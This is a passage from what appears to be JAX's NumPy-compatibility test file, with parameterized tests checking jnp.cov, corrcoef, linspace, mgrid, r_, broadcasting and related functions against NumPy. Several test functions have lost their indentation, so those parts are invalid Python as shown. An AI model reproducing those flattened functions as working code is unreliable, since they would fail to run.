         "bias": bias, "fweights": fweights, "aweights": aweights}
        for shape in [(5,), (10, 5), (5, 10)]
        for dtype in all_dtypes
        for y_dtype in [None, dtype]
        for rowvar in [True, False]
        for y_shape in _get_y_shapes(y_dtype, shape, rowvar)
        for bias in [True, False]
        for ddof in [None, 2, 3]
        for fweights in [True, False]
        for aweights in [True, False]))
  def testCov(self, shape, dtype, y_shape, y_dtype, rowvar, ddof, bias, fweights, aweights):
    """jnp.cov matches np.cov across rowvar/ddof/bias and optional y,
    fweights (positive ints), and aweights (positive reals)."""
    rng = jtu.rand_default(self.rng())
    # Both weight kinds must be positive; aweights take the real part of the
    # data dtype so complex inputs still get real-valued weights.
    wrng = jtu.rand_positive(self.rng())
    wdtype = np.real(dtype(0)).dtype
    # One weight per observation: columns when rowvar, else rows
    # (with the 1-row special case handled like rowvar).
    wshape = shape[-1:] if rowvar or shape[0] == 1 else shape[:1]

    args_maker = lambda: [rng(shape, dtype),
                          rng(y_shape, y_dtype) if y_dtype else None,
                          wrng(wshape, int) if fweights else None,
                          wrng(wshape, wdtype) if aweights else None]
    kwargs = dict(rowvar=rowvar, ddof=ddof, bias=bias)
    np_fun = lambda m, y, f, a: np.cov(m, y, fweights=f, aweights=a, **kwargs)
    jnp_fun = lambda m, y, f, a: jnp.cov(m, y, fweights=f, aweights=a, **kwargs)
    tol = {jnp.bfloat16: 5E-2, np.float16: 1E-2, np.float32: 1e-5,
           np.float64: 1e-13, np.complex64: 1e-5, np.complex128: 1e-13}
    tol = 7e-2 if jtu.device_under_test() == "tpu" else tol
    tol = jtu.join_tolerance(tol, jtu.tolerance(dtype))
    self._CheckAgainstNumpy(
        np_fun, jnp_fun, args_maker, check_dtypes=False, tol=tol)
    self._CompileAndCheck(jnp_fun, args_maker, atol=tol,
                          rtol=tol)
def testIssue967(self):
self.assertRaises(TypeError, lambda: jnp.zeros(1.5))
  @parameterized.named_parameters(
      jtu.cases_from_list(
        {"testcase_name": "_shape={}_dtype={}_rowvar={}".format(
          shape, dtype.__name__, rowvar),
         "shape": shape, "dtype": dtype, "rowvar": rowvar}
        for shape in [(5,), (10, 5), (3, 10)]
        for dtype in number_dtypes
        for rowvar in [True, False]))
  def testCorrCoef(self, shape, dtype, rowvar):
    """Checks jnp.corrcoef against np.corrcoef."""
    rng = jtu.rand_default(self.rng())
    def args_maker():
      # Re-draw until no variable has (near-)zero standard deviation, which
      # would make the correlation coefficient ill-defined.
      ok = False
      while not ok:
        x = rng(shape, dtype)
        ok = not np.any(np.isclose(np.std(x), 0.0))
      return (x,)
    np_fun = partial(np.corrcoef, rowvar=rowvar)
    np_fun = jtu.ignore_warning(
      category=RuntimeWarning, message="invalid value encountered.*")(np_fun)
    jnp_fun = partial(jnp.corrcoef, rowvar=rowvar)
    tol = 1e-2 if jtu.device_under_test() == "tpu" else None  # TPU: lower precision
    self._CheckAgainstNumpy(
        np_fun, jnp_fun, args_maker, check_dtypes=False,
        tol=tol)
    self._CompileAndCheck(jnp_fun, args_maker, atol=tol, rtol=tol)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_{}_{}".format(jtu.format_shape_dtype_string(shape, dtype),
        "None" if end_dtype is None else jtu.format_shape_dtype_string(end_shape, end_dtype),
        "None" if begin_dtype is None else jtu.format_shape_dtype_string(begin_shape, begin_dtype)),
       "shape": shape, "dtype": dtype, "end_shape": end_shape,
       "end_dtype": end_dtype, "begin_shape": begin_shape,
       "begin_dtype": begin_dtype}
      for dtype in number_dtypes
      for end_dtype in [None] + [dtype]
      for begin_dtype in [None] + [dtype]
      for shape in [s for s in all_shapes if s != jtu.PYTHON_SCALAR_SHAPE]
      for begin_shape in (
        [None] if begin_dtype is None
        else [s for s in all_shapes if s != jtu.PYTHON_SCALAR_SHAPE])
      for end_shape in (
        [None] if end_dtype is None
        else [s for s in all_shapes if s != jtu.PYTHON_SCALAR_SHAPE])))
  def testEDiff1d(self, shape, dtype, end_shape, end_dtype, begin_shape,
                  begin_dtype):
    """Checks jnp.ediff1d against np.ediff1d with optional to_end/to_begin."""
    rng = jtu.rand_default(self.rng())
    args_maker = lambda: [rng(shape, dtype),
                          (None if end_dtype is None else rng(end_shape, end_dtype)),
                          (None if begin_dtype is None else rng(begin_shape, begin_dtype))]
    np_fun = lambda x, to_end, to_begin: np.ediff1d(x, to_end, to_begin)
    jnp_fun = lambda x, to_end, to_begin: jnp.ediff1d(x, to_end, to_begin)
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
    self._CompileAndCheck(jnp_fun, args_maker)
def testEDiff1dWithDtypeCast(self):
rng = jtu.rand_default(self.rng())
shape = jtu.NUMPY_SCALAR_SHAPE
dtype = jnp.float32
end_dtype = jnp.int32
args_maker = lambda: [rng(shape, dtype), rng(shape, end_dtype), rng(shape, dtype)]
np_fun = lambda x, to_end, to_begin: np.ediff1d(x, to_end, to_begin)
jnp_fun = lambda x, to_end, to_begin: jnp.ediff1d(x, to_end, to_begin)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.named_parameters(
      jtu.cases_from_list(
        {"testcase_name": "_shapes={}_dtype={}_indexing={}_sparse={}".format(
          shapes, dtype, indexing, sparse),
         "shapes": shapes, "dtype": dtype, "indexing": indexing,
         "sparse": sparse}
        for shapes in [(), (5,), (5, 3)]
        for dtype in number_dtypes
        for indexing in ['xy', 'ij']
        for sparse in [True, False]))
  def testMeshGrid(self, shapes, dtype, indexing, sparse):
    """Checks jnp.meshgrid against np.meshgrid for both indexing conventions."""
    rng = jtu.rand_default(self.rng())
    # Each entry of `shapes` becomes one 1D input array of that length.
    args_maker = self._GetArgsMaker(rng, [(x,) for x in shapes],
                                    [dtype] * len(shapes))
    np_fun = partial(np.meshgrid, indexing=indexing, sparse=sparse)
    jnp_fun = partial(jnp.meshgrid, indexing=indexing, sparse=sparse)
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
    self._CompileAndCheck(jnp_fun, args_maker)
  def testMgrid(self):
    """jnp.mgrid must match np.mgrid for integer, complex, and float steps."""
    # Exact (bitwise) comparison helper for the integer-step cases.
    assertAllEqual = partial(self.assertAllClose, atol=0, rtol=0)
    assertAllEqual(np.mgrid[:4], jnp.mgrid[:4])
    assertAllEqual(np.mgrid[:4,], jnp.mgrid[:4,])
    assertAllEqual(np.mgrid[:4], jax.jit(lambda: jnp.mgrid[:4])())
    assertAllEqual(np.mgrid[:5, :5], jnp.mgrid[:5, :5])
    assertAllEqual(np.mgrid[:3, :2], jnp.mgrid[:3, :2])
    assertAllEqual(np.mgrid[1:4:2], jnp.mgrid[1:4:2])
    assertAllEqual(np.mgrid[1:5:3, :5], jnp.mgrid[1:5:3, :5])
    assertAllEqual(np.mgrid[:3, :2, :5], jnp.mgrid[:3, :2, :5])
    assertAllEqual(np.mgrid[:3:2, :2, :5], jnp.mgrid[:3:2, :2, :5])
    # Corner cases
    assertAllEqual(np.mgrid[:], jnp.mgrid[:])
    # When the step length is a complex number, because of float calculation,
    # the values between jnp and np might differ slightly.
    atol = 1e-6
    rtol = 1e-6
    self.assertAllClose(np.mgrid[-1:1:5j],
                        jnp.mgrid[-1:1:5j],
                        atol=atol,
                        rtol=rtol)
    self.assertAllClose(np.mgrid[3:4:7j],
                        jnp.mgrid[3:4:7j],
                        atol=atol,
                        rtol=rtol)
    self.assertAllClose(np.mgrid[1:6:8j, 2:4],
                        jnp.mgrid[1:6:8j, 2:4],
                        atol=atol,
                        rtol=rtol)
    # Non-integer steps
    self.assertAllClose(np.mgrid[0:3.5:0.5],
                        jnp.mgrid[0:3.5:0.5],
                        atol=atol,
                        rtol=rtol)
    self.assertAllClose(np.mgrid[1.3:4.2:0.3],
                        jnp.mgrid[1.3:4.2:0.3],
                        atol=atol,
                        rtol=rtol)
    # abstract tracer value for jnp.mgrid slice
    with self.assertRaisesRegex(jax.core.ConcretizationTypeError,
                                "slice start of jnp.mgrid"):
      jax.jit(lambda a, b: jnp.mgrid[a:b])(0, 2)
  def testOgrid(self):
    """jnp.ogrid must match np.ogrid, including the list-of-arrays cases."""
    def assertListOfArraysEqual(xs, ys):
      # Multi-dimensional ogrid returns a list of open-mesh arrays; compare
      # element-wise after checking both are lists of the same length.
      self.assertIsInstance(xs, list)
      self.assertIsInstance(ys, list)
      self.assertEqual(len(xs), len(ys))
      for x, y in zip(xs, ys):
        self.assertArraysEqual(x, y)
    self.assertArraysEqual(np.ogrid[:5], jnp.ogrid[:5])
    self.assertArraysEqual(np.ogrid[:5], jax.jit(lambda: jnp.ogrid[:5])())
    self.assertArraysEqual(np.ogrid[1:7:2], jnp.ogrid[1:7:2])
    # List of arrays
    assertListOfArraysEqual(np.ogrid[:5,], jnp.ogrid[:5,])
    assertListOfArraysEqual(np.ogrid[0:5, 1:3], jnp.ogrid[0:5, 1:3])
    assertListOfArraysEqual(np.ogrid[1:3:2, 2:9:3], jnp.ogrid[1:3:2, 2:9:3])
    assertListOfArraysEqual(np.ogrid[:5, :9, :11], jnp.ogrid[:5, :9, :11])
    # Corner cases
    self.assertArraysEqual(np.ogrid[:], jnp.ogrid[:])
    # Complex number steps: float rounding may differ slightly between jnp/np.
    atol = 1e-6
    rtol = 1e-6
    self.assertAllClose(np.ogrid[-1:1:5j],
                        jnp.ogrid[-1:1:5j],
                        atol=atol,
                        rtol=rtol)
    # Non-integer steps
    self.assertAllClose(np.ogrid[0:3.5:0.3],
                        jnp.ogrid[0:3.5:0.3],
                        atol=atol,
                        rtol=rtol)
    self.assertAllClose(np.ogrid[1.2:4.8:0.24],
                        jnp.ogrid[1.2:4.8:0.24],
                        atol=atol,
                        rtol=rtol)
    # abstract tracer value for ogrid slice
    with self.assertRaisesRegex(jax.core.ConcretizationTypeError,
                                "slice start of jnp.ogrid"):
      jax.jit(lambda a, b: jnp.ogrid[a:b])(0, 2)
  def testR_(self):
    """jnp.r_ must match np.r_ for concatenation, directives, and slice steps."""
    a = np.arange(6).reshape((2,3))
    self.assertArraysEqual(np.r_[np.array([1,2,3]), 0, 0, np.array([4,5,6])],
                           jnp.r_[np.array([1,2,3]), 0, 0, np.array([4,5,6])])
    self.assertArraysEqual(np.r_['-1', a, a], jnp.r_['-1', a, a])
    self.assertArraysEqual(np.r_['0,2', [1,2,3], [4,5,6]], jnp.r_['0,2', [1,2,3], [4,5,6]])
    self.assertArraysEqual(np.r_['0,2,0', [1,2,3], [4,5,6]], jnp.r_['0,2,0', [1,2,3], [4,5,6]])
    self.assertArraysEqual(np.r_['1,2,0', [1,2,3], [4,5,6]], jnp.r_['1,2,0', [1,2,3], [4,5,6]])
    # negative 1d axis start
    self.assertArraysEqual(np.r_['0,4,-1', [1,2,3], [4,5,6]], jnp.r_['0,4,-1', [1,2,3], [4,5,6]])
    self.assertArraysEqual(np.r_['0,4,-2', [1,2,3], [4,5,6]], jnp.r_['0,4,-2', [1,2,3], [4,5,6]])
    # matrix directives; np.matrix construction triggers a deprecation warning
    with warnings.catch_warnings():
      warnings.filterwarnings("ignore", category=PendingDeprecationWarning)
      self.assertArraysEqual(np.r_['r',[1,2,3], [4,5,6]], jnp.r_['r',[1,2,3], [4,5,6]])
      self.assertArraysEqual(np.r_['c', [1, 2, 3], [4, 5, 6]], jnp.r_['c', [1, 2, 3], [4, 5, 6]])
    # bad directive
    with self.assertRaisesRegex(ValueError, "could not understand directive.*"):
      jnp.r_["asdfgh",[1,2,3]]
    # abstract tracer value for r_ slice
    with self.assertRaisesRegex(jax.core.ConcretizationTypeError,
                                "slice start of jnp.r_"):
      jax.jit(lambda a, b: jnp.r_[a:b])(0, 2)
    # Complex number steps: float rounding may differ slightly between jnp/np.
    atol = 1e-6
    rtol = 1e-6
    self.assertAllClose(np.r_[-1:1:6j],
                        jnp.r_[-1:1:6j],
                        atol=atol,
                        rtol=rtol)
    self.assertAllClose(np.r_[-1:1:6j, [0]*3, 5, 6],
                        jnp.r_[-1:1:6j, [0]*3, 5, 6],
                        atol=atol,
                        rtol=rtol)
    # Non-integer steps
    self.assertAllClose(np.r_[1.2:4.8:0.24],
                        jnp.r_[1.2:4.8:0.24],
                        atol=atol,
                        rtol=rtol)
  def testC_(self):
    """jnp.c_ must match np.c_ for column stacking, directives, and slices."""
    a = np.arange(6).reshape((2, 3))
    self.assertArraysEqual(np.c_[np.array([1,2,3]), np.array([4,5,6])],
                           jnp.c_[np.array([1,2,3]), np.array([4,5,6])])
    self.assertArraysEqual(np.c_[np.array([[1,2,3]]), 0, 0, np.array([[4,5,6]])],
                           jnp.c_[np.array([[1,2,3]]), 0, 0, np.array([[4,5,6]])])
    self.assertArraysEqual(np.c_['-1', a, a], jnp.c_['-1', a, a])
    self.assertArraysEqual(np.c_['0,2', [1,2,3], [4,5,6]], jnp.c_['0,2', [1,2,3], [4,5,6]])
    self.assertArraysEqual(np.c_['0,2,0', [1,2,3], [4,5,6]], jnp.c_['0,2,0', [1,2,3], [4,5,6]])
    self.assertArraysEqual(np.c_['1,2,0', [1,2,3], [4,5,6]], jnp.c_['1,2,0', [1,2,3], [4,5,6]])
    # negative 1d axis start
    self.assertArraysEqual(np.c_['0,4,-1', [1,2,3], [4,5,6]], jnp.c_['0,4,-1', [1,2,3], [4,5,6]])
    self.assertArraysEqual(np.c_['0,4,-2', [1,2,3], [4,5,6]], jnp.c_['0,4,-2', [1,2,3], [4,5,6]])
    # matrix directives, avoid numpy deprecation warning
    with warnings.catch_warnings():
      warnings.filterwarnings("ignore", category=PendingDeprecationWarning)
      self.assertArraysEqual(np.c_['r',[1,2,3], [4,5,6]], jnp.c_['r',[1,2,3], [4,5,6]])
      self.assertArraysEqual(np.c_['c', [1, 2, 3], [4, 5, 6]], jnp.c_['c', [1, 2, 3], [4, 5, 6]])
    # bad directive
    with self.assertRaisesRegex(ValueError, "could not understand directive.*"):
      jnp.c_["asdfgh",[1,2,3]]
    # abstract tracer value for c_ slice
    with self.assertRaisesRegex(jax.core.ConcretizationTypeError,
                                "slice start of jnp.c_"):
      jax.jit(lambda a, b: jnp.c_[a:b])(0, 2)
    # Complex number steps: float rounding may differ slightly between jnp/np.
    atol = 1e-6
    rtol = 1e-6
    self.assertAllClose(np.c_[-1:1:6j],
                        jnp.c_[-1:1:6j],
                        atol=atol,
                        rtol=rtol)
    # Non-integer steps
    self.assertAllClose(np.c_[1.2:4.8:0.24],
                        jnp.c_[1.2:4.8:0.24],
                        atol=atol,
                        rtol=rtol)
def testS_(self):
self.assertEqual(np.s_[1:2:20],jnp.s_[1:2:20])
def testIndex_exp(self):
self.assertEqual(np.index_exp[5:3:2j],jnp.index_exp[5:3:2j])
  @parameterized.named_parameters(
      jtu.cases_from_list(
        {"testcase_name": ("_start_shape={}_stop_shape={}_num={}_endpoint={}"
                           "_retstep={}_dtype={}").format(
            start_shape, stop_shape, num, endpoint, retstep,
            dtype.__name__ if dtype else "None"),
         "start_shape": start_shape, "stop_shape": stop_shape,
         "num": num, "endpoint": endpoint, "retstep": retstep,
         "dtype": dtype}
        for start_shape in [(), (2,), (2, 2)]
        for stop_shape in [(), (2,), (2, 2)]
        for num in [0, 1, 2, 5, 20]
        for endpoint in [True, False]
        for retstep in [True, False]
        for dtype in number_dtypes + [None,]))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testLinspace(self, start_shape, stop_shape, num, endpoint, retstep, dtype):
    """Checks jnp.linspace against np.linspace over shapes, counts, and axes."""
    if num == 1 and not endpoint and numpy_version < (1, 18):
      raise SkipTest("Numpy < 1.18 has a linspace bug.")
    rng = jtu.rand_default(self.rng())
    # relax default tolerances slightly
    tol = jtu.tolerance(dtype if dtype else np.float32) * 10
    args_maker = self._GetArgsMaker(rng,
                                    [start_shape, stop_shape],
                                    [dtype, dtype])
    start, stop = args_maker()
    # Every valid axis of the broadcast result is exercised.
    ndim = len(np.shape(start + stop))
    for axis in range(-ndim, ndim):
      jnp_op = lambda start, stop: jnp.linspace(
        start, stop, num,
        endpoint=endpoint, retstep=retstep, dtype=dtype, axis=axis)
      # NumPy 1.20.0 changed the semantics of linspace to floor for integer
      # dtypes.
      if numpy_version >= (1, 20) or not np.issubdtype(dtype, np.integer):
        np_op = lambda start, stop: np.linspace(
          start, stop, num,
          endpoint=endpoint, retstep=retstep, dtype=dtype, axis=axis)
      else:
        def np_op(start, stop):
          # Emulate the >=1.20 integer flooring behavior on older NumPy.
          out = np.linspace(start, stop, num, endpoint=endpoint,
                            retstep=retstep, axis=axis)
          if retstep:
            return np.floor(out[0]).astype(dtype), out[1]
          else:
            return np.floor(out).astype(dtype)
      self._CheckAgainstNumpy(np_op, jnp_op, args_maker,
                              check_dtypes=False, tol=tol)
      # floating-point compute between jitted platforms and non-jit + rounding
      # cause unavoidable variation in integer truncation for some inputs.
      if dtype in (inexact_dtypes + [None,]):
        self._CompileAndCheck(jnp_op, args_maker,
                              check_dtypes=False, atol=tol, rtol=tol)
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name": "_dtype={}".format(dtype), "dtype": dtype}
for dtype in number_dtypes))
def testLinspaceEndpoints(self, dtype):
"""Regression test for Issue #3014."""
rng = jtu.rand_default(self.rng())
endpoints = rng((2,), dtype)
out = jnp.linspace(*endpoints, 10, dtype=dtype)
self.assertAllClose(out[np.array([0, -1])], endpoints, rtol=0, atol=0)
  @parameterized.named_parameters(
      jtu.cases_from_list(
        {"testcase_name": ("_start_shape={}_stop_shape={}_num={}_endpoint={}"
                           "_base={}_dtype={}").format(
            start_shape, stop_shape, num, endpoint, base,
            dtype.__name__ if dtype else "None"),
         "start_shape": start_shape,
         "stop_shape": stop_shape,
         "num": num, "endpoint": endpoint, "base": base,
         "dtype": dtype}
        for start_shape in [(), (2,), (2, 2)]
        for stop_shape in [(), (2,), (2, 2)]
        for num in [0, 1, 2, 5, 20]
        for endpoint in [True, False]
        for base in [10.0, 2, np.e]
        for dtype in inexact_dtypes + [None,]))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testLogspace(self, start_shape, stop_shape, num,
                   endpoint, base, dtype):
    """Checks jnp.logspace against np.logspace for several bases and axes."""
    if (dtype in int_dtypes and
        jtu.device_under_test() in ("gpu", "tpu") and
        not config.x64_enabled):
      raise unittest.SkipTest("GPUx32 truncated exponentiation"
                              " doesn't exactly match other platforms.")
    rng = jtu.rand_default(self.rng())
    # relax default tolerances slightly
    tol = {np.float16: 2e-2, np.float32: 1e-2, np.float64: 1e-6,
           np.complex64: 1e-3, np.complex128: 1e-6}
    args_maker = self._GetArgsMaker(rng,
                                    [start_shape, stop_shape],
                                    [dtype, dtype])
    start, stop = args_maker()
    # Every valid axis of the broadcast result is exercised.
    ndim = len(np.shape(start + stop))
    for axis in range(-ndim, ndim):
      jnp_op = lambda start, stop: jnp.logspace(
        start, stop, num, endpoint=endpoint, base=base, dtype=dtype, axis=axis)
      @jtu.ignore_warning(category=RuntimeWarning,
                          message="overflow encountered in power")
      def np_op(start, stop):
        return np.logspace(start, stop, num, endpoint=endpoint,
                           base=base, dtype=dtype, axis=axis)
      self._CheckAgainstNumpy(np_op, jnp_op, args_maker,
                              check_dtypes=False, tol=tol)
      if dtype in (inexact_dtypes + [None,]):
        # Why do compiled and op-by-op float16 np.power numbers differ
        # slightly more than expected?
        atol = {np.float16: 1e-2}
        self._CompileAndCheck(jnp_op, args_maker,
                              check_dtypes=False, atol=atol, rtol=tol)
  @parameterized.named_parameters(
      jtu.cases_from_list(
        {"testcase_name": ("_start_shape={}_stop_shape={}_num={}_endpoint={}"
                           "_dtype={}_axis={}").format(
            start_shape, stop_shape, num, endpoint,
            dtype.__name__ if dtype else "None", axis),
         "start_shape": start_shape,
         "stop_shape": stop_shape,
         "num": num, "endpoint": endpoint,
         "dtype": dtype, "axis": axis}
        for start_shape in [(), (2,), (2, 2)]
        for stop_shape in [(), (2,), (2, 2)]
        for num in [0, 1, 2, 5, 20]
        for endpoint in [True, False]
        # NB: numpy's geomspace gives nonsense results on integer types
        for dtype in inexact_dtypes + [None,]
        for axis in range(-max(len(start_shape), len(stop_shape)),
                          max(len(start_shape), len(stop_shape)))))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testGeomspace(self, start_shape, stop_shape, num,
                    endpoint, dtype, axis):
    """Checks jnp.geomspace against np.geomspace on well-defined inputs."""
    rng = jtu.rand_default(self.rng())
    # relax default tolerances slightly
    tol = {np.float16: 4e-3, np.float32: 2e-3, np.float64: 1e-14,
           np.complex128: 1e-14}
    def args_maker():
      """Test the set of inputs np.geomspace is well-defined on."""
      start, stop = self._GetArgsMaker(rng,
                                       [start_shape, stop_shape],
                                       [dtype, dtype])()
      # np.geomspace can't handle differently ranked tensors
      # w. negative numbers!
      start, stop = jnp.broadcast_arrays(start, stop)
      if dtype in complex_dtypes:
        return start, stop
      # to avoid NaNs, non-complex start and stop cannot
      # differ in sign, elementwise
      start = start * jnp.sign(start) * jnp.sign(stop)
      return start, stop
    start, stop = args_maker()
    def jnp_op(start, stop):
      return jnp.geomspace(start, stop, num, endpoint=endpoint, dtype=dtype,
                           axis=axis)
    def np_op(start, stop):
      # np.geomspace has no bfloat16 support; compute in float32 and cast back.
      start = start.astype(np.float32) if dtype == jnp.bfloat16 else start
      stop = stop.astype(np.float32) if dtype == jnp.bfloat16 else stop
      return np.geomspace(
        start, stop, num, endpoint=endpoint,
        dtype=dtype if dtype != jnp.bfloat16 else np.float32,
        axis=axis).astype(dtype)
    self._CheckAgainstNumpy(np_op, jnp_op, args_maker,
                            check_dtypes=False, tol=tol)
    if dtype in (inexact_dtypes + [None,]):
      self._CompileAndCheck(jnp_op, args_maker,
                            check_dtypes=False, atol=tol, rtol=tol)
  def testDisableNumpyRankPromotionBroadcasting(self):
    """The jax_numpy_rank_promotion flag must allow, raise, or warn as set."""
    # "allow": rank promotion proceeds silently.
    try:
      prev_flag = config.jax_numpy_rank_promotion
      FLAGS.jax_numpy_rank_promotion = "allow"
      jnp.ones(2) + jnp.ones((1, 2))  # works just fine
    finally:
      FLAGS.jax_numpy_rank_promotion = prev_flag
    # "raise": rank promotion is an error.
    try:
      prev_flag = config.jax_numpy_rank_promotion
      FLAGS.jax_numpy_rank_promotion = "raise"
      self.assertRaises(ValueError, lambda: jnp.ones(2) + jnp.ones((1, 2)))
    finally:
      FLAGS.jax_numpy_rank_promotion = prev_flag
    # "warn": rank promotion emits a warning, but not for scalar operands.
    try:
      prev_flag = config.jax_numpy_rank_promotion
      FLAGS.jax_numpy_rank_promotion = "warn"
      with warnings.catch_warnings(record=True) as w:
        warnings.simplefilter("always")
        jnp.ones(2) + jnp.ones((1, 2))
        assert len(w) > 0
        msg = str(w[-1].message)
        expected_msg = ("Following NumPy automatic rank promotion for add on "
                        "shapes (2,) (1, 2).")
        self.assertEqual(msg[:len(expected_msg)], expected_msg)
        prev_len = len(w)
        jnp.ones(2) + 3
        self.assertEqual(len(w), prev_len)  # don't want to warn for scalars
    finally:
      FLAGS.jax_numpy_rank_promotion = prev_flag
  @unittest.skip("Test fails on CI, perhaps due to JIT caching")
  def testDisableNumpyRankPromotionBroadcastingDecorator(self):
    """Same flag behaviors as above, via the jax.numpy_rank_promotion context manager."""
    with jax.numpy_rank_promotion("allow"):
      jnp.ones(2) + jnp.ones((1, 2))  # works just fine
    with jax.numpy_rank_promotion("raise"):
      self.assertRaises(ValueError, lambda: jnp.ones(2) + jnp.ones((1, 2)))
    with jax.numpy_rank_promotion("warn"):
      with warnings.catch_warnings(record=True) as w:
        warnings.simplefilter("always")
        jnp.ones(2) + jnp.ones((1, 2))
        assert len(w) > 0
        msg = str(w[-1].message)
        expected_msg = ("Following NumPy automatic rank promotion for add on "
                        "shapes (2,) (1, 2).")
        self.assertEqual(msg[:len(expected_msg)], expected_msg)
        prev_len = len(w)
        jnp.ones(2) + 3
        self.assertEqual(len(w), prev_len)  # don't want to warn for scalars
def testStackArrayArgument(self):
# tests https://github.com/google/jax/issues/1271
@api.jit
def foo(x):
return jnp.stack(x)
foo(np.zeros(2)) # doesn't crash
@api.jit
def foo(x):
return jnp.concatenate(x)
foo(np.zeros((2, 2))) # doesn't crash
  def testReluGradientConstants(self):
    """Gradient of jnp.maximum must not hoist large constants into the jaxpr."""
    # This is a regression test that verifies that constants associated with the
    # gradient of np.maximum (from lax._balanced_eq) aren't hoisted into the
    # outermost jaxpr. This was producing some large materialized constants for
    # every relu activation in a model.
    def body(i, xy):
      x, y = xy
      y = y + jax.grad(lambda z: jnp.sum(jnp.maximum(z, 0.)))(x)
      return x, y
    f = lambda y: lax.fori_loop(0, 5, body, (y, y))
    jaxpr = jax.make_jaxpr(f)(np.zeros((3, 4), np.float32))
    # A full (3, 4) array of 2.0 among the consts would indicate the bug.
    self.assertFalse(
      any(np.array_equal(x, np.full((3, 4), 2., dtype=np.float32))
          for x in jaxpr.consts))
@parameterized.named_parameters(
{"testcase_name": "_from={}_to={}".format(from_shape, to_shape),
"from_shape": from_shape, "to_shape": to_shape}
for from_shape, to_shape in [
[(1, 3), (4, 3)],
[(3,), (2, 1, 3)],
[(3,), (3, 3)],
[(1,), (3,)],
[(1,), 3],
])
def testBroadcastTo(self, from_shape, to_shape):
rng = jtu.rand_default(self.rng())
args_maker = self._GetArgsMaker(rng, [from_shape], [np.float32])
np_op = lambda x: np.broadcast_to(x, to_shape)
jnp_op = lambda x: jnp.broadcast_to(x, to_shape)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
  @parameterized.named_parameters(
      {"testcase_name": f"_{shapes}", "shapes": shapes, "broadcasted_shape": broadcasted_shape}
      for shapes, broadcasted_shape in [
        [[], ()],
        [[()], ()],
        [[(1, 3), (4, 3)], (4, 3)],
        [[(3,), (2, 1, 3)], (2, 1, 3)],
        [[(3,), (3, 3)], (3, 3)],
        [[(1,), (3,)], (3,)],
        [[(1,), 3], (3,)],
        [[(6, 7), (5, 6, 1), (7,), (5, 1, 7)], (5, 6, 7)],
        [[[1], [0, 1]], (0, 1)],
        [[(1,), np.array([0, 1])], (0, 1)],
      ])
  def testBroadcastShapes(self, shapes, broadcasted_shape):
    """jnp.broadcast_shapes must combine shape arguments per NumPy's rules."""
    # Test against np.broadcast_shapes once numpy 1.20 is minimum required version
    np.testing.assert_equal(jnp.broadcast_shapes(*shapes), broadcasted_shape)
def testBroadcastToIssue1522(self):
self.assertRaisesRegex(
ValueError, "Incompatible shapes for broadcasting: .*",
lambda: jnp.broadcast_to(np.ones((2, 3)), (1, 3)))
def testBroadcastToIntIssue1548(self):
self.assertAllClose(jnp.broadcast_to(1, (3, 2)), np.ones((3, 2)),
check_dtypes=False)
def testBroadcastToOnScalar(self):
self.assertIsInstance(jnp.broadcast_to(10.0, ()), jnp.ndarray)
self.assertIsInstance(np.broadcast_to(10.0, ()), np.ndarray)
  def testPrecision(self):
    """The precision= argument must be threaded through every dot-like op."""
    ones_1d = np.ones((2,))
    ones_2d = np.ones((2, 2))
    ones_3d = np.ones((2, 2, 2))
    HIGHEST = lax.Precision.HIGHEST

    # Default precision is None.
    jtu.assert_dot_precision(None, jnp.dot, ones_1d, ones_1d)
    jtu.assert_dot_precision(
        HIGHEST,
        partial(jnp.dot, precision=HIGHEST),
        ones_1d, ones_1d)
    jtu.assert_dot_precision(
        HIGHEST,
        partial(jnp.dot, precision=HIGHEST),
        ones_3d, ones_3d)
    jtu.assert_dot_precision(
        HIGHEST,
        partial(jnp.matmul, precision=HIGHEST),
        ones_2d, ones_2d)
    jtu.assert_dot_precision(
        HIGHEST,
        partial(jnp.vdot, precision=HIGHEST),
        ones_1d, ones_1d)
    jtu.assert_dot_precision(
        HIGHEST,
        partial(jnp.tensordot, axes=2, precision=HIGHEST),
        ones_2d, ones_2d)
    jtu.assert_dot_precision(
        HIGHEST,
        partial(jnp.tensordot, axes=(0, 0), precision=HIGHEST),
        ones_1d, ones_1d)
    jtu.assert_dot_precision(
        HIGHEST,
        partial(jnp.tensordot, axes=((0,), (0,)), precision=HIGHEST),
        ones_1d, ones_1d)
    jtu.assert_dot_precision(
        HIGHEST,
        partial(jnp.einsum, 'i,i', precision=HIGHEST),
        ones_1d, ones_1d)
    jtu.assert_dot_precision(
        HIGHEST,
        partial(jnp.einsum, 'ij,ij', precision=HIGHEST),
        ones_2d, ones_2d)
    jtu.assert_dot_precision(
        HIGHEST,
        partial(jnp.inner, precision=HIGHEST),
        ones_1d, ones_1d)
  @parameterized.named_parameters(
      jtu.cases_from_list(
        {"testcase_name": "_shape={}_varargs={} axis={}_dtype={}".format(
          shape, varargs, axis, dtype),
         "shape": shape, "varargs": varargs, "axis": axis, "dtype": dtype}
        for shape in [(10,), (10, 15), (10, 15, 20)]
        for _num_axes in range(len(shape))
        for varargs in itertools.combinations(range(1, len(shape) + 1), _num_axes)
        for axis in itertools.combinations(range(len(shape)), _num_axes)
        for dtype in inexact_dtypes))
  def testGradient(self, shape, varargs, axis, dtype):
    """Checks jnp.gradient against np.gradient with per-axis spacings."""
    rng = jtu.rand_default(self.rng())
    args_maker = self._GetArgsMaker(rng, [shape], [dtype])
    jnp_fun = lambda y: jnp.gradient(y, *varargs, axis=axis)
    np_fun = lambda y: np.gradient(y, *varargs, axis=axis)
    self._CheckAgainstNumpy(
        np_fun, jnp_fun, args_maker, check_dtypes=False)
    self._CompileAndCheck(jnp_fun, args_maker)
def testZerosShapeErrors(self):
# see https://github.com/google/jax/issues/1822
self.assertRaisesRegex(
TypeError,
"Shapes must be 1D sequences of concrete values of integer type.*",
lambda: jnp.zeros(1.))
self.assertRaisesRegex(
TypeError,
r"Shapes must be 1D sequences of concrete values of integer type.*\n"
